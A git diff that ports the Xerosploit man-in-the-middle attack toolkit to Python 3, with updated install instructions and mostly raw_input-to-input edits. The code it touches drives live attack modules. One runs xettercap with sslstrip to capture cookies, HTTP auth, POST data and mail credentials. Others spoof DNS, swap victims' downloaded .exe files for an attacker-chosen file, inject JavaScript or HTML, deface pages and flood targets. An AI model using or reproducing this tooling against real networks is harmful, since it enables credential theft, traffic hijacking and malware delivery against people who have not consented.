diff --git a/README.md b/README.md
index 7d82a16..7c1860a 100644
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
[![Version](https://img.shields.io/badge/Xerosploit-Version_1.0-brightgreen.svg?maxAge=259200)]()
-[![PyPI](https://img.shields.io/badge/Python-2.7-blue.svg)]()
+[![PyPI](https://img.shields.io/badge/Python-3.9-blue.svg)]()
[![Build](https://img.shields.io/badge/Supported_OS-linux-orange.svg)]()
[![AUR](https://img.shields.io/aur/license/yaourt.svg)]()
@@ -30,8 +30,8 @@ Instalation
=
Dependencies will be automatically installed.
- git clone https://github.com/LionSec/xerosploit
- cd xerosploit && sudo python install.py
+ git clone https://github.com/shivanshjoshi28/xerosploit
+ cd xerosploit && sudo python3 install.py
sudo xerosploit
@@ -45,7 +45,7 @@ Tested on
Ubuntu |
- 16.04 / 15.10 |
+ 20.04 / 16.04 / 15.10 |
Kali linux |
@@ -96,3 +96,10 @@ Contact
- Facebook : https://facebook.com/in98
- Twitter: @LionSec1
- Email : informatic98es@gmail.com
+
+
+# UPDATES DONE
+
+## All Errors Fixed
+
+LionSec/ xerosploit was not compatible with the new version of Python3. This can be helpful to them who are getting errors related to pip, raw_input.
diff --git a/install.py b/install.py
index 8e7dcfe..aaac41b 100755
--- a/install.py
+++ b/install.py
@@ -1,4 +1,4 @@
-#!/usr/bin/python
+#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import sys
@@ -25,7 +25,8 @@
#---------------------------------------------------------------------------#
if not os.geteuid() == 0:
- sys.exit("""\033[1;91m\n[!] Xerosploit installer must be run as root. ¯\_(ツ)_/¯\n\033[1;m""")
+ sys.exit(
+ """\033[1;91m\n[!] Xerosploit installer must be run as root. ¯\_(ツ)_/¯\n\033[1;m""")
print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
@@ -34,32 +35,38 @@
█ █
└══════════════════════════════════════════════════════════════┘ \033[1;m""")
+
def main():
- print("\033[1;34m\n[++] Please choose your operating system.\033[1;m")
+ print("\033[1;34m\n[++] Please choose your operating system.\033[1;m")
- print("""
+ print("""
1) Ubuntu / Kali linux / Others
2) Parrot OS
""")
- system0 = raw_input(">>> ")
- if system0 == "1":
- print("\033[1;34m\n[++] Installing Xerosploit ... \033[1;m")
- install = os.system("apt-get update && apt-get install -y nmap hping3 build-essential python-pip ruby-dev git libpcap-dev libgmp3-dev && pip install tabulate terminaltables")
+ system0 = input(">>> ")
+ if system0 == "1":
+ print("\033[1;34m\n[++] Installing Xerosploit ... \033[1;m")
+ install = os.system(
+ "apt-get update && apt install python3-pip && apt-get install -y nmap hping3 build-essential python3-pip ruby-dev git libpcap-dev libgmp3-dev && pip3 install tabulate terminaltables")
+
+ install1 = os.system("""cd tools/bettercap/ && gem build bettercap.* && sudo gem install xettercap-* && rm xettercap-* && cd ../../ && mkdir -p /opt/xerosploit && cp -R tools/ /opt/xerosploit/ && cp xerosploit.py /opt/xerosploit/xerosploit.py && cp banner.py /opt/xerosploit/banner.py && cp run.sh /usr/bin/xerosploit && chmod +x /usr/bin/xerosploit && tput setaf 34; echo "Xerosploit has been sucessfully installed. Execute 'xerosploit' in your terminal." """)
+ elif system0 == "2":
+ print("\033[1;34m\n[++] Installing Xerosploit ... \033[1;m")
+
+
+ bet_un = os.system("apt-get remove bettercap")# Remove bettercap to avoid some problems . Installed by default with apt-get .
+
+ bet_re_ins = os.system("gem install bettercap")# Reinstall bettercap with gem.
- install1 = os.system("""cd tools/bettercap/ && gem build bettercap.* && sudo gem install xettercap-* && rm xettercap-* && cd ../../ && mkdir -p /opt/xerosploit && cp -R tools/ /opt/xerosploit/ && cp xerosploit.py /opt/xerosploit/xerosploit.py && cp banner.py /opt/xerosploit/banner.py && cp run.sh /usr/bin/xerosploit && chmod +x /usr/bin/xerosploit && tput setaf 34; echo "Xerosploit has been sucessfuly instaled. Execute 'xerosploit' in your terminal." """)
- elif system0 == "2":
- print("\033[1;34m\n[++] Installing Xerosploit ... \033[1;m")
+ install = os.system(
+ "apt-get update && apt install python3-pip && apt-get install -y nmap hping3 ruby-dev git libpcap-dev libgmp3-dev python3-tabulate python3-terminaltables")
- bet_un = os.system("apt-get remove bettercap") # Remove bettercap to avoid some problems . Installed by default with apt-get .
- bet_re_ins = os.system("gem install bettercap") # Reinstall bettercap with gem.
+ install1 = os.system("""cd tools/bettercap/ && gem build bettercap.* && sudo gem install xettercap-* && rm xettercap-* && cd ../../ && mkdir -p /opt/xerosploit && cp -R tools/ /opt/xerosploit/ && cp xerosploit.py /opt/xerosploit/xerosploit.py && cp banner.py /opt/xerosploit/banner.py && cp run.sh /usr/bin/xerosploit && chmod +x /usr/bin/xerosploit && tput setaf 34; echo "Xerosploit has been sucessfully installed. Execute 'xerosploit' in your terminal." """)
- install = os.system("apt-get update && apt-get install -y nmap hping3 ruby-dev git libpcap-dev libgmp3-dev python-tabulate python-terminaltables")
+ else:
+ print("Please select the option 1 or 2")
+ main()
- install1 = os.system("""cd tools/bettercap/ && gem build bettercap.* && sudo gem install xettercap-* && rm xettercap-* && cd ../../ && mkdir -p /opt/xerosploit && cp -R tools/ /opt/xerosploit/ && cp xerosploit.py /opt/xerosploit/xerosploit.py && cp banner.py /opt/xerosploit/banner.py && cp run.sh /usr/bin/xerosploit && chmod +x /usr/bin/xerosploit && tput setaf 34; echo "Xerosploit has been sucessfuly instaled. Execute 'xerosploit' in your terminal." """)
-
- else:
- print("Please select the option 1 or 2")
- main()
main()
diff --git a/run.sh b/run.sh
index ed46789..32eb6d4 100755
--- a/run.sh
+++ b/run.sh
@@ -21,6 +21,6 @@
# #
#---------------------------------------------------------------------------#
-python /opt/xerosploit/xerosploit.py
+python3 /opt/xerosploit/xerosploit.py
diff --git a/xerosploit.py b/xerosploit.py
index b1a02c7..14ebe5e 100755
--- a/xerosploit.py
+++ b/xerosploit.py
@@ -1,4 +1,4 @@
-#!/usr/bin/python
+#!/usr/bin/python3
# -*- coding: utf-8 -*-
#---------------------------------------------------------------------------#
@@ -135,7 +135,7 @@ def target_ip():
target_parse = " --target " # Bettercap target parse . This variable will be wiped if the user want to perform MITM ATTACK on all the network.
print ("\033[1;32m\n[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.\n\033[1;m")
- target_ips = raw_input("\033[1;36m\033[4mXero\033[0m\033[1;36m ➮ \033[1;m").strip()
+ target_ips = input("\033[1;36m\033[4mXero\033[0m\033[1;36m ➮ \033[1;m").strip()
if target_ips == "back":
home()
@@ -157,7 +157,7 @@ def program0():
def option():
""" Choose a module """
print("\033[1;32m\n[+] Which module do you want to load ? Enter 'help' for more information.\n\033[1;m")
- options = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m\033[1;36m ➮ \033[1;m").strip() # select an option , port scan , vulnerability scan .. etc...
+ options = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m\033[1;36m ➮ \033[1;m").strip() # select an option , port scan , vulnerability scan .. etc...
# Port scanner
if options == "pscan":
print(""" \033[1;36m
@@ -177,7 +177,7 @@ def pscan():
print("\033[1;32m\n[+] Enter 'run' to execute the 'pscan' command.\n\033[1;m")
- action_pscan = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mpscan\033[0m\033[1;36m ➮ \033[1;m").strip()#ip to scan
+ action_pscan = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mpscan\033[0m\033[1;36m ➮ \033[1;m").strip()#ip to scan
if action_pscan == "back":
option()
elif action_pscan == "exit":
@@ -246,7 +246,7 @@ def dos():
print("\033[1;32m\n[+] Enter 'run' to execute the 'dos' command.\n\033[1;m")
- action_dos = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdos\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_dos = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdos\033[0m\033[1;36m ➮ \033[1;m").strip()
if action_dos == "back":
option()
@@ -284,7 +284,7 @@ def ping():
print("\033[1;32m\n[+] Enter 'run' to execute the 'ping' command.\n\033[1;m")
- action_ping = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mping\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_ping = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mping\033[0m\033[1;36m ➮ \033[1;m").strip()
if action_ping == "back":
option()
@@ -328,7 +328,7 @@ def ping():
└══════════════════════════════════════════════════════════════┘ \033[1;m""")
def inject_html():
print("\033[1;32m\n[+] Enter 'run' to execute the 'injecthtml' command.\n\033[1;m")
- action_inject = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjecthtml\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_inject = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjecthtml\033[0m\033[1;36m ➮ \033[1;m").strip()
if action_inject == "back":
option()
elif action_inject == "exit":
@@ -337,7 +337,7 @@ def inject_html():
home()
elif action_inject == "run":
print("\033[1;32m\n[+] Specify the file containing html code you would like to inject.\n\033[1;m")
- html_file = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mInjecthtml\033[0m\033[1;36m ➮ \033[1;m")
+ html_file = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mInjecthtml\033[0m\033[1;36m ➮ \033[1;m")
if html_file == "back":
inject_html()
@@ -369,7 +369,7 @@ def inject_html():
└══════════════════════════════════════════════════════════════┘ \033[1;m""")
def rdownload():
print("\033[1;32m\n[+] Please type 'run' to execute the 'rdownload' command.\n\033[1;m")
- action_rdownload = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_rdownload = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m").strip()
if action_rdownload == "back":
option()
elif action_rdownload == "exit":
@@ -379,9 +379,9 @@ def rdownload():
elif action_rdownload == "run":
module = "/opt/xerosploit/tools/bettercap/modules/http/replace_file.rb"
print("\033[1;32m\n[+] Specify the extension of the files to replace. (e.g. exe)\n\033[1;m")
- ext_rdownload = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m").strip()
+ ext_rdownload = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m").strip()
print("\033[1;32m\n[+] Set the file to use in order to replace the ones matching the extension.\n\033[1;m")
- file_rdownload = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m")
+ file_rdownload = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m")
file_rdownload = file_rdownload.replace("'","")
if file_rdownload == "back":
rdownload()
@@ -410,7 +410,7 @@ def rdownload():
def snif():
print("\033[1;32m\n[+] Please type 'run' to execute the 'sniff' command.\n\033[1;m")
- action_snif = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_snif = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
if action_snif == "back":
option()
elif action_snif == "exit":
@@ -421,7 +421,7 @@ def snif():
def snif_sslstrip():
print("\033[1;32m\n[+] Do you want to load sslstrip ? (y/n).\n\033[1;m")
- action_snif_sslstrip = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_snif_sslstrip = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
if action_snif_sslstrip == "y":
print("\033[1;34m\n[++] All logs are saved on : /opt/xerosploit/xerosniff \033[1;m")
print("\033[1;34m\n[++] Sniffing on " + target_name + "\033[1;m")
@@ -436,7 +436,7 @@ def snif_sslstrip():
cmd_snif = os.system("xettercap --proxy " + target_parse + target_ips + " -P MYSQL,SNPP,DHCP,WHATSAPP,RLOGIN,IRC,HTTPS,POST,PGSQL,NNTP,DICT,HTTPAUTH,TEAMVIEWER,MAIL,SNMP,MPD,COOKIE,NTLMSS,FTP,REDIS -I " + up_interface + " --gateway " + gateway + " -O, --log /opt/xerosploit/xerosniff/" + filename + ".log --sniffer-output /opt/xerosploit/xerosniff/" + filename + ".pcap")
def snifflog():
print("\033[1;32m\n[+] Do you want to save logs ? (y/n).\n\033[1;m")
- action_log = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_log = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
if action_log == "n":
cmd_log = os.system("rm /opt/xerosploit/xerosniff/" + filename + ".*")
print("\033[1;31m\n[++] Logs have been removed. \n\033[1;m")
@@ -473,7 +473,7 @@ def snifflog():
def snifflog():
print("\033[1;32m\n[+] Do you want to save logs ? (y/n).\n\033[1;m")
- action_log = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_log = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
if action_log == "n":
cmd_log = os.system("rm /opt/xerosploit/xerosniff/" + filename + ".*")
print("\033[1;31m\n[++] Logs have been removed. \n\033[1;m")
@@ -522,7 +522,7 @@ def snifflog():
└══════════════════════════════════════════════════════════════┘ \033[1;m""")
def dspoof():
print("\033[1;32m\n[+] Enter 'run' to execute the 'dspoof' command.\n\033[1;m")
- action_dspoof = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdspoof\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_dspoof = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdspoof\033[0m\033[1;36m ➮ \033[1;m").strip()
if action_dspoof == "back":
option()
elif action_dspoof == "exit":
@@ -531,7 +531,7 @@ def dspoof():
home()
elif action_dspoof == "run":
print("\033[1;32m\n[+] Enter the IP address where you want to redirect the traffic.\n\033[1;m")
- action_dspoof_ip = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdspoof\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_dspoof_ip = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdspoof\033[0m\033[1;36m ➮ \033[1;m").strip()
dns_conf = action_dspoof_ip + " .*\.*"
outdns = open('/opt/xerosploit/tools/files/dns.conf','w')
outdns.write(dns_conf)
@@ -556,7 +556,7 @@ def dspoof():
└══════════════════════════════════════════════════════════════┘ \033[1;m""")
def yplay():
print("\033[1;32m\n[+] Enter 'run' to execute the 'yplay' command.\n\033[1;m")
- action_yplay = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4myplay\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_yplay = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4myplay\033[0m\033[1;36m ➮ \033[1;m").strip()
if action_yplay == "back":
option()
elif action_yplay == "exit":
@@ -565,7 +565,7 @@ def yplay():
home()
elif action_yplay == "run":
print("\033[1;32m\n[+] Insert a youtube video ID. (e.g. NvhZu5M41Z8)\n\033[1;m")
- video_id = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4myplay\033[0m\033[1;36m ➮ \033[1;m").strip()
+ video_id = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4myplay\033[0m\033[1;36m ➮ \033[1;m").strip()
if video_id == "back":
option()
elif video_id == "": # if raw = null
@@ -600,7 +600,7 @@ def yplay():
└══════════════════════════════════════════════════════════════┘ \033[1;m""")
def replace():
print("\033[1;32m\n[+] Enter 'run' to execute the 'replace' command.\n\033[1;m")
- action_replace = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mreplace\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_replace = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mreplace\033[0m\033[1;36m ➮ \033[1;m").strip()
if action_replace == "back":
option()
elif action_replace == "exit":
@@ -609,7 +609,7 @@ def replace():
home()
elif action_replace == "run":
print("\033[1;32m\n[+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png)\n\033[1;m")
- img_replace = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mreplace\033[0m\033[1;36m ➮ \033[1;m")
+ img_replace = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mreplace\033[0m\033[1;36m ➮ \033[1;m")
img_replace = img_replace.replace("'","")
if img_replace == "back":
replace()
@@ -645,7 +645,7 @@ def replace():
└══════════════════════════════════════════════════════════════┘ \033[1;m""")
def driftnet():
print("\033[1;32m\n[+] Enter 'run' to execute the 'driftnet' command.\n\033[1;m")
- action_driftnet = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdriftnet\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_driftnet = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdriftnet\033[0m\033[1;36m ➮ \033[1;m").strip()
if action_driftnet == "back":
option()
elif action_driftnet == "exit":
@@ -675,7 +675,7 @@ def driftnet():
└══════════════════════════════════════════════════════════════┘ \033[1;m""")
def shakescreen():
print("\033[1;32m\n[+] Enter 'run' to execute the 'move' command.\n\033[1;m")
- action_shakescreen = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mshakescreen\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_shakescreen = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mshakescreen\033[0m\033[1;36m ➮ \033[1;m").strip()
if action_shakescreen == "back":
option()
elif action_shakescreen == "exit":
@@ -703,7 +703,7 @@ def shakescreen():
└══════════════════════════════════════════════════════════════┘ \033[1;m""")
def inject_j():
print("\033[1;32m\n[+] Enter 'run' to execute the 'injectjs' command.\n\033[1;m")
- action_inject_j = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjectjs\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_inject_j = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjectjs\033[0m\033[1;36m ➮ \033[1;m").strip()
if action_inject_j == "back":
option()
elif action_inject_j == "exit":
@@ -712,7 +712,7 @@ def inject_j():
home()
elif action_inject_j == "run":
print("\033[1;32m\n[+] Specify the file containing js code you would like to inject.\n\033[1;m")
- js_file = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjectjs\033[0m\033[1;36m ➮ \033[1;m")
+ js_file = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjectjs\033[0m\033[1;36m ➮ \033[1;m")
js_file = js_file.replace("'","")
if js_file == "back":
inject_j()
@@ -742,7 +742,7 @@ def inject_j():
└══════════════════════════════════════════════════════════════┘ \033[1;m""")
def deface():
print("\033[1;32m\n[+] Enter 'run' to execute the 'deface' command.\n\033[1;m")
- action_deface = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdeface\033[0m\033[1;36m ➮ \033[1;m").strip()
+ action_deface = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdeface\033[0m\033[1;36m ➮ \033[1;m").strip()
if action_deface == "back":
option()
elif action_deface == "exit":
@@ -753,7 +753,7 @@ def deface():
print("\033[1;32m\n[+] Specify the file containing your defacement code .\033[1;m")
print("\033[1;33m\n[!] Your file should not contain Javascript code .\n\033[1;m")
- file_deface = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdeface\033[0m\033[1;36m ➮ \033[1;m")
+ file_deface = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdeface\033[0m\033[1;36m ➮ \033[1;m")
if file_deface == "back":
option()
@@ -863,7 +863,7 @@ def deface():
def cmd0():
while True:
print("\033[1;32m\n[+] Please type 'help' to view commands.\n\033[1;m")
- cmd_0 = raw_input("\033[1;36m\033[4mXero\033[0m\033[1;36m ➮ \033[1;m").strip()
+ cmd_0 = input("\033[1;36m\033[4mXero\033[0m\033[1;36m ➮ \033[1;m").strip()
if cmd_0 == "scan": # Map the network
print("\033[1;34m\n[++] Mapping your network ... \n\033[1;m")
scan()
@@ -879,7 +879,7 @@ def gateway():
print(table.table)
print("\033[1;32m\n[+] Enter your network gateway.\n\033[1;m")
- n_gateway = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mgateway\033[0m\033[1;36m ➮ \033[1;m").strip()
+ n_gateway = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mgateway\033[0m\033[1;36m ➮ \033[1;m").strip()
if n_gateway == "back":
home()
@@ -906,7 +906,7 @@ def iface():
print(table.table)
print("\033[1;32m\n[+] Enter your network interface.\n\033[1;m")
- n_up_interface = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4miface\033[0m\033[1;36m ➮ \033[1;m").strip()
+ n_up_interface = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4miface\033[0m\033[1;36m ➮ \033[1;m").strip()
if n_up_interface == "back":
home()
@@ -930,7 +930,7 @@ def iface():
elif cmd_0 == "rmlog": # Remove all logs
def rm_log():
print("\033[1;32m\n[+] Do want to remove all xerosploit logs ? (y/n)\n\033[1;m")
- cmd_rmlog = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mrmlog\033[0m\033[1;36m ➮ \033[1;m").strip()
+ cmd_rmlog = input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mrmlog\033[0m\033[1;36m ➮ \033[1;m").strip()
if cmd_rmlog == "y":
rmlog = os.system("rm -f -R /opt/xerosploit/xerosniff/ /opt/xerosploit/tools/log/* /opt/xerosploit/tools/bettercap/modules/tmp/* /opt/xerosploit/tools/files/dns.conf")
print("\033[1;31m\n[++] All logs have been removed. \n\033[1;m")